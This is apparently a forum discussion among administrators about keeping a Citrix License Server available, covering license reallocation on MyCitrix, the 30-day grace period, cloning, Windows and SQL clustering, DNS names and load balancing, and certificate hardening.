include a table in an attachment and the table is too wide, or not wide enough, you can change the default character width of tables from 65 to some other value using the table width specifier within the features block. features: table width: 75 Disabling document caching By default, docassemble caches assembled documents for performance reasons. To disable the document caching feature for a given interview, set cache documents to False. features: cache documents: False Producing PDF/A files If you want the PDF files produced by your interview to be in PDF/A format, you can set this as a default: features: pdf/a: True The default is determined by the pdf/a configuration directive. The setting can also be made on a per-attachment basis by setting the pdf/a attachment setting. When using docx template file, you also have the option of creating a “tagged PDF,” which is similar to PDF/A. You can set this as an interview-wide default: features: tagged pdf: True The default is determined by the tagged pdf configuration directive. This setting can also be made on a per-attachment basis by setting the tagged pdf attachment setting. Limiting size of uploaded images If your users upload digital photos into your interviews, the uploads may take a long time. Images can be reduced in size before they are uploaded. To require by default for all uploads in your interview, set maximum image size in the features block of your interview. In this example, images will be reduced in size so that they are no taller than 100 pixels and no wider than 100 pixels. Note that the image file type of the uploaded file may be changed to PNG during the conversion process. Different browsers behave differently. This is just a default value; you can override it by setting the maximum image size in a field definition. If you have an interview-wide default, but you want to override it for a particular field to allow full-resolution camera uploads, you can set the maximum image size field modifier to None. If you want to use a site-side default value, set the maximum image size in the configuration. Converting the format of uploaded images If you are using maximum image size, you can also cause images to be converted to PNG, JPEG, or BMP by the browser during the upload process by setting the image upload type to png, jpeg, or bmp. Going full screen when interview is embedded It is possible to embed a docassemble interview in a web page using an iframe. However, the user experience on mobile is degraded when an interview is embedded. If you want the interview to switch to “full screen” after the user moves to the next screen in the embedded interview, you can do so. Within a features block, include go full screen: True. features: go full screen: True --- question: | Let's go on a quest! subquestion: | How exciting would you like your quest to be? field: excitement_level choices: - Thrilling - Interesting - Soporific --- question: | We are nearing the end of the quest. field: quest_almost_over --- question: | We have finished the quest. buttons: - Return: exit url: | ${ referring_url() } need: - excitement_level - quest_almost_over mandatory: True For more information about implementing an embedded interview like this, see the HTML source of the web page used in this example. Note that in this example, the user is provided with an exit button at the end of the interview that directs the user back to the page that originally embedded the interview. This is accomplished by setting the url of the exit button to the result of the referring_url() function. If you only want the interview to go full screen if the user is using a mobile device, use go full screen: mobile. features: go full screen: mobile --- code: | if device().is_mobile or device().is_tablet: on_mobile = True else: on_mobile = False --- mandatory: True code: | excitement_level quest_almost_over if on_mobile: final_screen_mobile else: final_screen_desktop --- question: | Let's go on a quest! subquestion: | % if on_mobile: I see you are using a mobile device. % else: I see that you are not using a mobile device. % endif How exciting would you like your quest to be? field: excitement_level choices: - Thrilling - Interesting - Soporific --- question: | We are nearing the end of the quest. field: quest_almost_over --- event: final_screen_mobile question: | We have finished the quest. buttons: - Return: exit url: | ${ referring_url() } --- event: final_screen_desktop question: | We have finished the quest. Note that this example provides a different ending screen depending on whether the user is on a desktop or a mobile device. If a desktop user is viewing the interview in an iframe on a web site, the interview should not provide an exit button that takes the user to a web site, because then the user will see a web site embedded in a web site. The interview in this example uses the device() function to detect whether the user is using a mobile device. Note that the interview logic looks both at device().is_mobile as well as device().is_tablet. This corresponds with the functionality of go full screen: mobile, which will make the interview go full screen if the user has either a mobile phone or a tablet. Infinite loop protection The infinite loop protection section of the configuration documentation explains how you can change the default limits on recursion and looping for all interviews on the server. You can also set these limits on a per-interview basis using the loop limit and recursion limit features. features: loop limit: 600 recursion limit: 600
https://docassemble.com.br/docs/initial.html
CC-MAIN-2020-45
refinedweb
11,686
61.97
Created on 2014-02-23 17:59 by rednaw, last changed 2014-02-24 16:09 by r.david.murray. If you look at the `header_encode` method in the `Charset` class in `email.charset`, you'll see that depending on the `header_encoding` that is set on the `Charset` instance, it will either encode it using base64 or quoted-printable (QP): However, QP always uses `maxlinelen=None` and base64 doesn't. This results in the following behaviour: - If you use base64 encoding and your header size is longer than the default `maxlinelen`, it will be split over multiple lines. - If you use QP encoding with the same header it doesn't get split over multiple lines. You can easily test it with this snippet: from email.charset import Charset, BASE64, QP header = ( ' ) charset = Charset('utf-8') charset.header_encoding = BASE64 print 'BASE64:' print charset.header_encode(header) charset.header_encoding = QP print 'QP:' print charset.header_encode(header) Which will output: BASE64: =?utf-8?b?dGVqa3N0aiB0bGtqZXMgdGFrbGRqZiBhc2VpbyBuZWFvaWZsayBhc25mb2llYXMg?= =?utf-8?b?bmZsa2RhbiBmb2VpYXMgbmFza2xuIGlvZWFzbiBrbGRhbiBmbGthbnNvaWUgbmFz?= =?utf-8?b?bGsgZG5hc2xrIGZuZGFzbGsgZm5lb2lzYWYgbmVrbGFzbiBkZmtsYXNuZiBvaWFz?= =?utf-8?b?ZW5mIGxrYWRzbiBsa2ZhbmxkayBmYXMgZGZrbmFpb2UgbmFz?= QP: =?utf-8?q?= This is inconsistent behavior. Aside from that, I think the `header_encode` method should accept an argument `maxlinelen` that defaults to an appropriate value (probably 76), but which you can overwrite on free will. This is (I think) also necessary because the `Header` class in `email.header` has a `maxlinelen` attribute that is used for the same purpose. Normally this works fine, but when you specified a charset for your header, it uses the `Charset` class and the `maxlinelen` is lost. This is happening here: You see, the `_encode_chunks` takes the `maxlinelen` argument but doesn't pass it on to the `header_encode` method of `charset` (which is a `Charset` instance). As such, you can see this issue in action with the following snippet: from email.header import Header maxlinelen = 9999999 print 'No charset:' print Header( ', maxlinelen=maxlinelen ).encode() print 'Charset with special characters:'=9999999 ).encode() Which will output: No chars Charset with special characters: ==?= This is currently an issue we're experiencing in Django, see our issue in the issue tracker: The line wrapping is done by Header, not header_encode. The bug appears to be that maxlinelen=None is not passed to base64mime's header_encode the way it is to quoprimime's header_encode...and that base64mime doesn't handle a maxlinelen of None. Using maxlinelen=9999999 in the base64mime.header_encode calll, your base64 example also results in a single line header. This should be fixed. It does not affect python3, which uses a different folding algorithm. Line wrapping is indeed done by `Header`, but why do `base64mime` and `quoprimime` then have their own line wrapping? I assume so that you can also use them independently. So that's why I would think `Charset.header_encode` should also accept a `maxlinelen` so that you can use `Charset` independently too. I've no clue, to tell you the truth. Those APIs evolved long before I took over email package maintenance. And since we are talking about 2.7, we can't change the existing API. In Python3, Charset.header_encode will as of 3.5 become a legacy interface, so there's not much point in changing it there either, although it is not out of the question if there is a use case. Ok, so you suggest to use `maxlinelen=None` for the `base64mime.header_encode` which will act the same as giving `maxlinelen=None` to `email.quoprimime`, so that we don't need to change the API? And this change would then also be reflected in the Python 3.5 legacy interface? Well, we have to make base64mime.header_encode also handle a None value...so perhaps instead we should just use 10000, which is what the Header wrapping code in python3 does. Python3's Header doesn't have this bug. Ok, do you think there's any risk in making `base64mime.header_encode` handle `maxlinelen=None`? I think it would be more consistent if `base64mime.header_encode` and `quoprimime.header_encode` interpret their arguments similarly. Well, there's the usual API change risk: something that works on 2.7.x doesn't work on 2.7.x-1. So since we can fix the bug without making the API change, I think we should. That wasn't clear. By "something that works" I mean exactly what you are talking about: someone writing code using these functions would naturally try to use None with base64mime, and if we make it work, that would work fine in 2.7.x, but mysteriously break if run on an earlier version of 2.7. So instead we force the author of new code to use a non-None value that will in fact work in previous versions of 2.7.
http://bugs.python.org/issue20747
CC-MAIN-2016-18
refinedweb
786
67.86
Welcome to async tasks, threads, pools, and executors. Oh, my! So many aspects of threading and thread management that are Android-specific. In her talk from 360|AnDev, Stacy Devino covers the essentials of the various schools of thought on these topics. Why Learn Multithreading? (0:44) I consider multithreading a core skill of the modern developer. Even when we’re talking about the phones in our pockets, for the most part, they’re quad core. Lots of RAM, and faster than your computer in 2005! We basically need the ability to run multiple tasks concurrently. As humans, we can move both of our arms independently, and both of our legs independently. You are able to accomplish different tasks with them. To demonstrate what you are asking your phone to do on a continuous basis, I want you (yes, the you who is reading this) to try and pat your head and rub your stomach at the same time. It’s really hard, isn’t it? When we think about the concepts of multithreaded programming, we have to think about the fact that we have essentially asked our phones to pat their head and rub their stomach at the same time. Fortunately for us, they’re computers, not people, so we can make them do our bidding. What is a Thread? (2:01) A thread is an independent execution worker. It is the worker bee. You are the queen bee, and you get to tell the worker bee what to do. All of Android works on the basis of threads, even when we’re talking about a Hello World app. A Hello World app primarily runs in what we consider a single thread, your main thread. You’ll also see people call it their “UI thread,” although main thread is probably the best construct. You need to know how to do threading if you want to: - Do anything within logins - Load more information - Cache information - Use web and RESTful APIs - Perform tasks in the background that doesn’t cause your app to stall 4 Basic Thread Types (3:20) Android has four basic types of threads. You’ll see other documentation talk about even more, but we’re going to focus on Thread, Handler, AsyncTask, and something called HandlerThread. You may have heard HandlerThread just called the “Handler/Looper combo”. As long as you know how one of these four categories works, you can understand what’s actually going on in the background for things like Futures, IntentService, Jobs, and Alarms. Basic Thread (4:31) So let’s talk about a basic Thread example. long rootRandom = System.currentTimeMillis(); private class RandomThread extends Thread { long seed; RandomThread (long seed) { this.seed = seed; } @Override public void run() { Random seededRandom = new Random(seed); rootRandom = seededRandom.nextInt(); } } We have something where we want to compute what I’m calling a rootRandom, like a seededRandom value. If you do something like encryption, this would be a direct analog. If I want to make this run in the background, I need to declare all this stuff, and pass in my long integer. It would then compute that seededRandom value in the background that I would perhaps use somewhere else. Why would I want to have encryption or a rootRandom value computed in the background? Because sometimes they’re very, very big. Also, sometimes we don’t think about the fact that an operation that we’re asking or that we actually need for our application, it takes a lot of compute cycles. It can take a lot of values. If you know Java, this is the basic example of how they generate a thread. Handler (5:47) Every so often, I need to send a signal to somewhere else that this process is still alive, or that my app is still running, or that I have a piece of information that’s just kind of timed element, otherwise known as maybe a TimerTask. But here, we’re actually using it with a Runnable and a Handler: Get more development news like this private Handler mHandler = new Handler(); private int lifeSignDelay = 5000; private Runnable mainRunnable = new Runnable() { @Override public void run() { sendLifeSign(true); mHandler.postDelayed(mainRunnable, lifeSignDelay); } }; Handler is its own special type of thread in the background. If I want to have things that are executed in services, or in other parts of the application, I can do it really, really simply just by this code. I’m just declaring a new Handler, and then I assign some random number, right? Then I have a Runnable that I then execute in the Handler. When I’ve actually sent my lifeSign, I just post delay it. That means that I can have it continually run and self-propagate, but it also means that I’m allowing other things to run without interfering with it. I’m also not holding the objects in that thread for any longer than I need to. It will generate as necessary, so that’s really, really useful. Knowing about Handler, we can do a lot of things that allow us to have communication with UI and main threads. Plus, it’s really good with stuff like messaging tasks. Async Task (7:49) AsyncTask can only be called from an Activity on your main thread. That sucks, because sometimes you have things like Services, or other external classes that you want to have actually be able to run separated tasks. However, there are some specific reasons why they made this helper thread. This thread helps you accomplish things without having to know a lot about what’s actually happening in the background. Let’s assume that I have made a new Activity, and I wanted to load an image into an ImageView. But I still want the user to be able to scroll up and down while I’m loading that task. So, what would be a good thing for me to use is AsyncTask: public class MyUIActivity extends AppCompatActivity { //.... private ImageView mImageView = view.findViewById(R.id.someView); //OnCreate and all other tasks contained above //Usage //- inside of a function of from a onClick new DownloadImageTask().execute(""); //AsyncTask private class DownloadImageTask extends AsyncTask<String, Void, Bitmap> { protected Bitmap doInBackground(String... urls) { return loadImageFromNetwork(urls[0]); } protected void onPostExecute(Bitmap result) { mImageView.setImageBitmap(result); } } } Here I’ve just declared a task that extends AsyncTask, and then I just execute it and run it in the background. Once it’s done being able to load that information, it puts it right back in the image. If I had those elements, the user can still interact with my app. I’m still prioritizing how I’m actually loading information, but I’m not interfering with what they’re doing. This would be good for something like user logins, since that’s not something that needs to be used in other activities. If you have an object that is directly related to what is going on in that Activity, AsyncTask is a very good tool to use. HandlerThread (9:35) Here we have HandlerThread. This is a relatively new thing that they put out, and there’s not a lot of great documentation on it. If we just want to be able to make something run in the background, we can do what I call the “basic version”: HandlerThread handlerThread = new HandlerThread("newHandlerThread"); handlerThread.start(); Handler myHandler = new Handler(handlerThread.getLooper()); myHandler.post(new Runnable() {...}); We declare a new HandlerThread and give it a name. We tell it to start, but then we have to give it a Looper task. What does Looper actually do? We’re generating a thread that we’re giving a task, but we’re also saying, “Hey, I want this thread to stay alive.” Maybe I’m actually executing multiple image cachings: I don’t want that thread to die, because every time I generate a new thread, that’s more work that has to go on. However, you must also be careful with this, because you can end up having a thread that never dies. (That could be good or bad.) If you’re not using that thread, you have computation that is continually going on in the background, and you are using system resources. It’s not like it just stays there. What is it for? Why would I want to have something like this actually run? Suppose I have a task where I have no idea whether it’s going to take 5 seconds or 50 seconds? d AsyncTask might not be a good idea, because I might need it as a system resource, like the camera. Say I am Pokemon GO. If I’m trying to dynamically grab your camera for that AR mode every single time, and I didn’t lock on it while you actually were using the application, it would take about two seconds of loading time in a lot of cases to be able to load and lock on to that resource. This is especially true if you’re using older devices. Think beyond just cameras, though. Let’s say you have a chat that’s going back and forth like Google Hangouts. I’d want to have a Looper thread of the instance that I’m currently in to be able to make sure that I’m grabbing those messaging tasks and being able to post those to the front of the application, but also still be able to get those bits of information even if I go to another application. So, you know how you get those notification saying, “Hey, somebody just sent you another message.” You can still keep that instance going, and still keep that prioritization, without actually affecting what’s immediately in front of them. If you did that AsyncTask, that wouldn’t be very good, because if they went to another app, the whole thing would lose Context. Java 8 and MultiThreading (13:30) Some new stuff happened in Java 8 that actually affects threading. The big change we are going to focus on is lambda expressions. My seededRandom example above took all this code to write it: private class RandomThread extends Thread { long seed; RandomThread (long seed) { this.seed = seed; } @Override public void run() { } } That’s not even talking about initialization. Now I can take all of that information and just make it a lambda expression: private Runnable RandomThread = (long seed) -> { Random seededRandom = new Random(seed); rootRandom = seededRandom.nextInt(); } That substantially decreased the amount of code that I actually have to write. Advanced Threading (14:20) Let’s see a really basic example of what is called a “self-managed thread”. Traditionally in Android, you’re going to not declare things as regular thread, but as Runnable. It’s just another variation of the regular thread class, but it’s a more Android-specific version: private ConnectThread implements Runnable { @Override public void run(){ while(!Thread.currentThread().isInterrupted()) { if(newConnection) { newConnection = false; SocketClass.startClient(); new Thread(new TimeOutThread()).start(); } if(serverReply != null) { if(serverReply.equals(Constants.ACK) ||serverReply.equals(Constants.NAK) ||serverReply.equals(Constants.STOP)) { Thread.currentThread().interrupt(); sendCompleteEvent(serverReply); return; } } } } } Once I’m spawning, I’m keeping myself alive, not with a Looper, but with the while statement. This is a manual example a not-particularly-Androidy way to do it. In this example, I’m creating a socket-level connection with the server and getting very simple responses back. I’m actually spawning a second thread and causing a timeout. I don’t have that thread on here, but you can tell by the name, TimeOutThread. I have to make sure that if I had a timeout condition, that I can close it and then close it again. I’m still keeping the thread alive even though I’ve spawned another, waiting to find out my server reply. If I receive a response, I will interrupt the thread, causing a stop in the while loop, and say, “Okay, this event completed,” and then I’ll just return back. I’ve created a situation where I can actually start threads from within myself, and then once I know that that task is done, that whole thread closes down, and I’d be able to create self-managed tasks, so that I know what is going on at every moment. Executors (17:59) Executors help us in a huge way. I would not want to do that self-managed, spawning thread manually, or at least to that degree. It basically executes Runnable task. Now, when we talk about Runnable task, we’re literally talking about Runnables. We’re not talking about the class thread that we talked about at the very beginning of this presentation. So I can do two things with it. So I can make AsyncTask thread, and I can spawn them or I can actually have a situation where I’m making them fully synchronous. Let’s say I have to write this new thread, RunnableTask, hand it start: (new Thread(RunnableTask)).start(); And that’s assuming I have no other variables to pass into it. Now, with Executor, I can declare a single executor and be able to run multiple tasks on that one executor. That one executor will be able to generate multiple threads for me: Executor executor = anExecutor(); executor.execute(new RunnableTask()); executor.execute(new NextRunnableTask()); I just want to be able to execute a single thread in one of my activities, or I have a custom view class or a service. And I just really want a direct call. The DirectExecutor is the most common implementation: class DirectExecutor implements Executor { public void execute(Runnable task) { task.run(); } } Here we’re just giving it the simple Runnable task, and then just telling it to run. This way, they run in the same thread. This is more of a synchronous operation where we’re executing one, then executing the next, then executing a third. Now if I want to be able to generate new threads every single time, I would use the ThreadPerTaskExecutor: class ThreadPerTaskExecutor Implements Executor { public void execute( Runnable task ) { new Thread(task).start(); } } In the execute function, I’m generating a new thread for each time that I get a new task put into it. ThreadPoolExecutor (20:31) Unless you have one or two simple operations, you should probably be using what’s called a ThreadPoolExecutor. In ThreadPerTaskExecutor, I generate a thread, they do their stuff, and then they die. If I constantly have new stuff coming up, other stuff dying, that becomes a lot of work for me to be able to track. ThreadPoolExecutor is instantiated very similarly to how we instantiate Executor normally: ThreadPoolExecutor mThreadPool = new ThreadPoolExecutor( //initial processor pool size Runtime.getRuntime().availableProcessors(), //Max processor pool size Runtime.getRuntime().availableProcessors(), //Time to Keep Alive 3, //TimeUnit for Keep Alive TimeUnit.SECONDS, //Queue of Runnables mWorkQueue ); In the beginning, we need to make sure that we actually create that thread pool. Now I’m putting in some random kind of numbers here as examples, but you may not want to have every processor core be able to be used as part of your thread pool. And you want to be able to reuse that thread pool for as long as you actually need those pieces to go. You could have a situation where you have an application that has multiple ThreadPoolExecutors. If I have a thread pool that I need to have dedicated to preloading images, that would be a good reason to have its own thread pool. But if you’re talking about something where I want to be able to constantly access it, I’ve got an API that I’m constantly hitting, or multiple APIs, hey, I might want to keep one ThreadPoolExecutor just for that purpose. And it might be my general purpose ThreadPoolExecutor because I always have stuff that’s running. I never really truly need to close it down unless I’m no longer using the application. public class MyTaskManager { //... //Run the Task on the Pool mThreadPool.execute( someTask.getRunnable()); //.. Now when done mThreadPool.shutdown(); } The most common thing I see happen is they’re like, “Oh, thread pool executors, great. I need to thread pool execute every single thing.” No. No, you don’t. You need to make sure that you’re using it only in instances where you are going to constantly be needing the workers that are in that container. Once you are done, you need to shut it down. This is why I make sure to put mThreadPool.shutdown(). When you are done with those tasks, kill those worker threads. Executor Services (23:44) This is really related to Futures, but you can see it’s a very similar to when we’re talking about the standard Executor, except that I’m doing this on a fixed thread pool, so I don’t have the ability to change some of those parameters: private class NetworkServ (; ; ) { //Run on the new ThreadPool pool.execute( new Handler(serverSocket.accept()) ); } } catch (IOException ex) { // This signals shutdown the pool pool.shutdown(); } } } class Handler implements Runnable { private final Socket socket; Handler(Socket socket) { this.socket = socket; } public void run(){ //read and service request on socket } } This is geared toward specific things. If you’re familiar with JavaScript Promises, that’s the best analog. MultiThreading Libraries (24:33) Now, for RxJava and libraries that have their own thread management. (I’m not trying to start a flame war, and I’m not taking sides!) You may be thinking that you don’t need to know anything about thread management because there are libraries that do it for you, but you need to know how this works, because ultimately if you get in the practice of using libraries that you don’t understand, you are going to make mistakes. RxJava First up is RxJava. I commonly see the situation where you have leaked Messages, and Observables, and things that are still active, because people didn’t know that they should close it down. It’s not perfect, because it’s taking a general execution model to what might be a very specific problem that you have. In a self-propagating process where I’m doing extra spawning, I might want to have some things run concurrently and other things run synchronously. It’s going to be a lot harder for you to set that up in RxJava. So what does RxJava actually give us? If you’re looking at being able to simply pass bits of information from one activity or class to another, RxJava can make it quite easy to gather that and then be able to return back just those objects. It can significantly simplify the writing of modules. For logins, I can write a very short bit of RxJava code to be able to handle login, and I don’t have to write three or four little threads to be able to handle all of the eccentricities oAuth and all these other problems that you’ve had if you’ve tried to actually build your own login service. It’s also very easy to set up communication between multiple threads. If you have information that needs to be passed back and forth between multiple threads, you don’t have to build it manually. It’s good if you need to serialize results. You can do that in RxJava without too much work, and you don’t have to think about how the processes are actually operating in your head. The biggest challenge that a lot of people have is being able to understand when do you need to have concurrent information, and when do you need to have things that are basically in a line. Retrofit A lot of us use Retrofit. I use it a lot, actually. It really, really simplifies calls to your RESTful APIs, and it’s a specialty-built thing. It uses RxJava in the backend, but remember that it’s using RxJava in a very specific capacity, and it’s been optimized for that. It’s very good at handling your RESTful call, giving you back the information, and turning it into an interface so that you don’t really have to know that much about being able to do custom API calls. Bolts-Android Bolts-Android has been open sourced by Parse and Facebook. They use it within their application. It’s a good event-based model to be able to work back and forth. It doesn’t have as many advanced features, but if you’re looking to do things that are very simple from a call and execute system, Bolts Android is a very good library because it’s very purpose-built. Picasso and Glide Picasso and Glide handle things a little bit differently in terms of threading under the hood, even though they have very similar results in terms of thread performance. They’re both specialty packages built to be image loaders. Glide actually uses thread pool executor and a lot of specialty Handlers on the underside. Depending on what version of Picasso you have, it’s primarily using ThreadPoolExecutor, and some newer stuff I’ve seen actually uses RxJava in the back end. Q&A (29:43) Q: If I were to make a custom image loader, what kind of threads or thread management would I want to be able to put together if I were not using a library? Stacy: I would use ThreadPoolExecutor in combination with other threads to accomplish it. I would also make a Runnable or a new Thread to handle different tasks. So I’d have the situation where I’d say, Okay, I want to have this thread pool, but here I want to actually download the image.” Once I’m done downloading the image, maybe I do resize, maybe I do something else after that, and have that all run within that single execution. But when I’m done with it, what might I want to do with that thread pool? Stop it, shut it down. Now, an important thing I didn’t bring up in here is that thread pools don’t immediately shut down. You send a shutdown signal. So when I say shutdown(), I’m telling it, “Hey, once you’re finished, I need you to shut down.” But what if I have a thread that’s just gone crazy, a thread that I’ve passed something to, and it just doesn’t want to die, a zombie thread? What I can do in that situation is can say, “Hey, after a certain amount of time, do these threads execute” what they need to, and then shut down? If they didn’t, I can tell it to shut down now, right? It’s the difference between when you hit the power button on your computer to say, “I need this off. I just got a million things” of spyware, it won’t go down.” Q: If I’m making a custom Executor and passing a bunch of threads to it, what would you recommend is the best way to pass information back to the main thread? Stacy: So the same way that you saw that I did things in that kinda simplified double spawning thread, right? I want to be able to either set a variable or be able to pass it back to some external class. So you would treat it just like you would passing information back from a standard method or function that you have. For AsyncTask, I’ve seen some weird stuff where somebody made a blank activity and a bunch of custom constructors around their AsyncTask system. Don’t do that. Keep it to the very simplified task that you just need in that one instance. So in your case, you really just want to treat it like you would any other information or any other function, because really, all you’re doing is just running other functions inside of another thread. The variables, you can quite easily pass those back. Q: What about Loaders? Stacy: Once you understand how these core four types of threading tools work, it’s very easy to be able to look at those other things like Loaders, and be able to see what it’s doing and what it’s returning back to you. Q: Is there a separate method to call in an instance where a thread is running out of control as a zombie? Stacy: Right, so what you would do is basically once you hit your shutdown, you have another piece of code like in a try-catch statement to figure out, “Okay, I need to wait. Have I counted this many times, right? And If I don’t shutdown in a certain amount of time, I need to send what’s called shutdownnow(). That is the power button your threads.
https://academy.realm.io/posts/360andev-stacy-devino-async-tasks-threads-pools-executors-android/
CC-MAIN-2018-47
refinedweb
4,152
70.73
This tutorial will take building a temperature and humidity collection node as an example to demonstrate how to access the Blynk cloud service platform through the UIFlow programming device. And realize simple remote control function through Blynk APP. Before accessing, you need to register an account through the Blynk APP and log in to create an application instance to obtain the corresponding Auth Token. Click here to visit Blynk official website and install Blynk APP . Click the +Add button above the APP, Create project->The device type is ESP32 Dev Board, and the connection mode is Wi-Fi. After the project is successfully created, the Blynk service will generate a unique Auth Token for the project and send it to your registered mailbox. We will use this key in the subsequent steps. After completing the project creation, you will enter the control panel, and you can customize and add controls through the sidebar. This case will add two Labeled Value to display temperature and humidity data (set the refresh time to 1s), and add a Button to control the speaker's sound. The "real pins" and "virtual pins" are used in Blynk. The actual pin refers to that the level control made in the App will actually be applied to the corresponding pin number on the hardware device. Virtual pin is a virtual pin, we can understand it as an identifier, APP and device program will use this identifier to transfer information, and customize the processing program. The following application case will use virtual pins for configuration. Burn UIFlow firmware for your device (firmware requires v1.7.4 and above), click the corresponding document link below to view the detailed programming steps. UIFlow firmware burning steps - Click to download the case program m5f file , open the file in UiFlow, or follow the picture below Drag and drop code blocks. In the case program, the data is pushed to the APP display panel via the Blynk server by monitoring the data refresh request UIFlow also supports user-defined configuration of the connected Blynk server. It is only necessary to pass in the server IP and port parameters during the initialization phase of the program. from IoTcloud import blynk //Initialize the connection blynk1 = blynk.Blynk(token='xxxxxxxxxxxxxxxxxxxxxxxxxx') //Response callback def blynk_read_v3(v_pin,value): print(value) //Response data to the specified VPIN blynk1.virtual_write(v_pin, "Hello!") //Bind virtual pins to respond to callbacks blynk1.handle_event('read v3', blynk_read_v3) //Disconnect blynk1.disconnect() //send email blynk1.email('', '', '') //Send notification blynk1.tweet('') //Send notification blynk1.notify('') //Configure control property parameters blynk1.set_property(0, '', '') //Synchronize virtual pin state blynk1.virtual_sync(0) while True: blynk1.run() After the device is successfully connected to the network and running the code, click the run button in the upper right corner of the APP project page to realize cloud connection and obtain real-time temperature and humidity data. Click the SPK control button to drive the device speaker to sound. Check Blynk official documentation for more control related content
https://docs.m5stack.com/en/uiflow/iotcloud/blynk
CC-MAIN-2021-43
refinedweb
498
56.05
As promised yesterday, here’s an example sketch which uses the ChibiOS RTOS to create a separate task for keeping an LED blinking at 2 Hz, no matter what else the code is doing: #include <ChibiOS_AVR.h> static WORKING_AREA(waThread1, 50); void Thread1 () { const uint8_t LED_PIN = 9; pinMode(LED_PIN, OUTPUT); while (1) { digitalWrite(LED_PIN, LOW); chThdSleepMilliseconds(100); digitalWrite(LED_PIN, HIGH); chThdSleepMilliseconds(400); } } void setup () { chBegin(mainThread); } void mainThread () { chThdCreateStatic(waThread1, sizeof (waThread1), NORMALPRIO + 2, (tfunc_t) Thread1, 0); while (true) loop(); } void loop () { delay(1000); } There are several things to note about this approach: - there’s now a “Thread1″ task, which does all the LED blinking, even the LED pin setup - each task needs a working area for its stack, this will consume a bit of memory - calls to delay()are forbidden inside threads, they need to play nice and go to sleep - only a few changes are needed, compared to the original setup()and loop()code chBegin()is what starts the RTOS going, and mainThread()takes over control - to keep things similar to what Arduino does, I decided to call loop()when idling Note that inside loop() there is a call to delay(), but that’s ok: at some point, the RTOS runs out of other things to do, so we might as well make the main thread similar to what the Arduino does. There is also an idle task – it runs (but does nothing) whenever no other tasks are asking for processor time. Note that despite the delay call, the LED still blinks in the proper rate. You’re looking at a real multitasking “kernel” running inside the ATmega328 here, and it’s preemptive, which simply means that the RTOS can (and will) decide to break off any current activity, if there is something more important that needs to be done first. This includes suddenly disrupting that delay() call, and letting Thread1 run to keep the LEDs blinking. In case you’re wondering: this compiles to 3,120 bytes of code – ChibiOS is really tiny. Stay tuned for details on how to get this working in your projects… it’s very easy! You could also check out FreeRTOS, it seems to have a more flexible licensing option and runs on way more platforms. I have been using it for over a year and have only good things to say about it. FreeRTOS and ChibiOS/RT are both excellent RTOSses. In my experience is FreeRTOS heavier on RAM and ROM usage. It runs fine with a few tasks on a MEGA, but you easily run out of RAM on the smaller AVRs. NilRtOS is even smaller (currently 600-1000 bytes of ROM). Looking at the roadmap of ChibiOS however, the idea of Giovanni is to use ChibiOS for 16/32 bit systems, and focus NilRTOS on the 8 bit systems like AVR. And last but not least: the AVR port and RTOS frindly libraries for Arduino are very good maintaned, which I find a big plus for choosing either ChibiOS or NilRTOS…
http://jeelabs.org/2013/05/24/blinking-in-real-time/
CC-MAIN-2014-35
refinedweb
502
58.25
opt for a different server with a different hostname, you'd need to reallocate the licenses on MyCitrix.com and reissue them for the 2nd server and it's hostname. If you had enough licenses, you could allocate half of your licenses to each, but that would be a waste since the farm can only talk to one of'm not recommending what comes next but it would be possible to: 1. Bring up a license server with XYZ Name, return the licenses on My Citrix, reissue those licenses to another server. I only mention this as compliment to Carl's suggestion in that he already hit the nail on the head with the most obvious fact that Citrix did finally extrapolate out the Licensing component but then put it on another server using Apache\Tomcat\httpd "stuff" that has caused me some issues in FIPS compliance areas where I've had to replace their self-signed certificate with a Verisign 2048 Bit RSA 256 and then modify the httpd and ssl config files to disable SSL 2 and SSL 3 and force HIGH encryption cipher suites. But I digress. If clustering is not an option I would wonder why cloning is not an option. Is it a physical server? Now if we are talking about an active-active scenario then yes, I get it. That would make sense although again you have 30 days but your secondary site would be pointing to the primary not another independent source. All you need is FQDN. You assign the FQDN name to the files you download. Create a DNS record. Make it a VIP if you want. I always recommend new SSL Certificate and ALWAYS replace the self-signed certificate that Citrix places on the server along with the private key. Not only is it 1024 but it is SHA1. If that FQDN corresponds to a clusterIP, even better. If that FQDN corresponds to a LB VIP, good too. Now I mention those last two because your only other option is DNS round-robin for two servers sharing the same FQDN unless you were to delegate that record to Netscaler and use GSLB or F5 LB VIP or Netscaler LB VIP and each License Server added. My issue with that primarily is I've always used SQL Cluster and why waste two more VM's when you already have a SQL Cluster that in my case is always Physical Hardware. I simply won't sign off on a design without a Physical Cluster. Depending on the size of the environment you can leverage that cluster for more than just SQL given the underlying Microsoft Clustering Options outside of SQL. Then, combined with DFS Namespace? I'm not even going to start on that one. Also the other advantage of having the same server FQDN waiting is that this server is also our SQL server that contains very critical databases. The SQL is backed up every night using Arcserve backup software. I didn't realize I had 30 days to move the licenses. So that eliminates any panic. But why go to all the trouble. You have more than enough time to rebuild the thing from scratch if necessary. Cloning a VM is bit of a trick question without knowing your hypervisor. VMWare ESX HyperV XenServer On FQDN, take note - I want to be clear that I did not say same FQDN of the SQL Server. Not what I said. Or if I did convey that I did not mean to convey that. SQL Clustering has nothing to do with Windows Clustering for Network Services, File Services, Licensing Server. Nothing to do with SQL at all. You can install Microsoft Clustering for 2-nodes and have a clustered file server. SQL has the added option of running in a Cluster as well but you must install that option. I've never needed more than 2 so I've always used the 2-Node Cluster and Quorum option. I've yet to try SQL 2012 Active State option. The FQDN is just a DNS entry that points to a new CLUSTER service that you manually create. You would assign another Storage LUN, just like SQL but for Licensing only. The service you create with the Server Console is just a service that is tied to that LUN. Let's say that LUN is allocated to Server 1 and it is iSCSI or in your case Fiber most likely and allocated to an ESX host. See, I stated physical hardware. Microsoft does not support SQL Clustering on VMWare ESX although VMWare will state they do. Does it work, far as I can tell - yea. But someone concerned about the Microsoft vendor support will want physical full servers or blades. Those blades will have two Fiber cards. Why two? What is the point of having a cluster if you have a single point of failure? Two fiber cards plug into two different cores switches so that is 4 fiber cards in 2 blades or servers and 4 redundant connections active aggregate or active\passive. Or, that could be iSCSI. Point is, the hardware is fully HA. Hot swap drives, processors, memory, power supplies, plugged in to separate PDU's and most cases those PDU's are on two different power grids. Getting the picture? That FQDN is license server specific. My point was for Citrix I always use physical SQL clusters and only host the XenApp and XenDesktop databases and then License Server. I stand up another SQL Server Virtual Machine for Logging. I have dedicated Insight appliances per two Netscaler HA pair, two Director console servers behind a LB VIP and FQDN and SSL Certificate, that information goes to another Virtual Server SQL. Your FQDN might be citrixlicensing.mycompany. But what if you have more than one farm? More than one domain namespace? That is a long conversation. For now, just know that the licensing FQDN is like a CNAME for both your license servers. You are 